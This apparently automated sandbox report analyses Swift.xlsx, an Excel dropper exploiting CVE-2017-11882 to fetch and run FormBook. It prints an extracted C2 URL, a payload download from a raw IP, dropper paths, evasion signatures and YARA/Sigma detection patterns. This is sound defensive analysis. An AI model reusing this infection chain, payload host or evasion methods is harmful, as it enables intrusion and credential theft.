Play interactive tour

Edit tour

Windows Analysis Report Swift.xlsx

Overview

General Information

Sample Name:	Swift.xlsx
Analysis ID:	502159
MD5:	9a43d5d2ffc56e823280ca84f6bb870f
SHA1:	f0945075b44bc2cb2c96b168d47a269eb0d714ce
SHA256:	88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
Tags:	FormbookVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Maps a DLL or memory area into another process

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Contains functionality to detect sleep reduction / modifications

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Potential document exploit detected (performs DNS queries)

Contains functionality to record screenshots

PE file contains executable resources (Code or Archives)

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Drops PE files to the user directory

Contains functionality to detect sandboxes (mouse cursor move detection)

May check if the current machine is a sandbox (GetTickCount - Sleep)

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2068 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1188 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2564 cmdline: 'C:\Users\Public\vbc.exe' MD5: A65B1815177EF9EBA7E5E894BBF65A3C)

DpiScaling.exe (PID: 1464 cmdline: C:\Windows\System32\DpiScaling.exe MD5: 8C9DA2E414E713D3DAFF1F18223AE11B)

explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

Zxsdvph.exe (PID: 2680 cmdline: 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe' MD5: A65B1815177EF9EBA7E5E894BBF65A3C)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\Libraries\hpvdsxZ.url	Methodology_Contains_Shortcut_OtherURIhandlers	Detects possible shortcut usage for .URL persistence	@itsreallynick (Nick Carr)	0x14:$file: URL= 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 6 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 192.3.222.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1188, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1188, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2564

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.septemberstockevent200.com/ht08/"], "decoy": ["joye.club", "istanbulemlakgalerisi.online", "annikadaniel.love", "oooci.com", "curebase-test.com", "swisstradecenter.com", "hacticum.com", "centercodebase.com", "recbi56ni.com", "mmj0115.xyz", "sharpstead.com", "sprklbeauty.com", "progettogenesi.cloud", "dolinum.com", "amaroqadvisors.com", "traininig.com", "leewaysvcs.com", "nashhomesearch.com", "joy1263.com", "serkanyamac.com", "nursingprogramsforme.com", "huakf.com", "1w3.online", "watermountsteam.top", "tyralruutan.quest", "mattlambert.xyz", "xn--fiqs8sypgfujbl4a.xn--czru2d", "hfgoal.com", "587868.net", "noyoucantridemyonewheel.com", "riewesell.top", "expn.asia", "suplementarsas.com", "item154655544.com", "cdgdentists.com", "deboraverdian.com", "franquiciasexclusivas.tienda", "tminus-10.com", "psychoterapeuta-wroclaw.com", "coachingbywatson.com", "lknitti.net", "belenpison.agency", "facilitetec.com", "99077000.com", "thefitmog.com", "kinmanpowerwashing.com", "escueladelbuenamor.com", "getjoyce.net", "oilelm.com", "maikoufarm.com", "hespresso.net", "timothyschmallrealt.com", "knoxvilleraingutters.com", "roonkingagency.online", "trashwasher.com", "angyfoods.com", "yungbredda.com", "digipoint-entertainment.com", "shangduli.space", "kalaraskincare.com", "ktnsound.xyz", "miabellavita.com", "thenlpmentor.com", "marzhukov.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORY

Source: 7.0.DpiScaling.exe.72480000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.DpiScaling.exe.72480000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: DpiScaling.exe

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00409218 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,		9_2_00409218
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 9_2_00405AA4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		9_2_00405AA4

Source: global traffic

DNS query: name: onedrive.live.com

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 4x nop then pop ebx	7_2_72486ABE
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	9_2_0049D80C
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 4x nop then xor eax, eax	9_2_0049FB94
Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe	Code function: 4x nop then mov edx, eax	9_2_0049DED8

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.3.222.155:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.septemberstockevent200.com/ht08/

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 15:05:26 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Wed, 13 Oct 2021 09:47:27 GMTETag: "f7c00-5ce38d98ee1b4"Accept-Ranges: bytesContent-Length: 1014784Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 f0 09 00 00 88 05 00 00 00 00 00 2c ff 09 00 00 10 00 00 00 00 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 0f 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 0b 00 60 27 00 00 00 e0 0c 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 bc bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 8c ef 09 00 00 10 00 00 00 f0 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 64 b2 01 00 00 00 0a 00 00 b4 01 00 00 f4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 0d 00 00 00 c0 0b 00 00 00 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 60 27 00 00 00 d0 0b 00 00 28 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0c 00 00 00 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0c 00 00 02 00 00 00 d0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc bf 00 00 00 20 0c 00 00 c0 00 00 00 d2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 ea 02 00 00 e0 0c 00 00 ea 02 00 00 92 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 00 00 00 00 00 7c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /008008/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.222.155Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.222.155

Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp	String found in binary or memory: http://java.w
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.687535121.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.637889890.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: DpiScaling.exe, 00000007.00000002.702517793.0000000002000000.00000002.00020000.sdmp, explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000002.696339073.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.658976324.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.666365294.0000000008427000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000008.00000000.636747511.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: global traffic

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

Code function: 9_2_0042C3D4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

9_2_0042C3D4

Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe

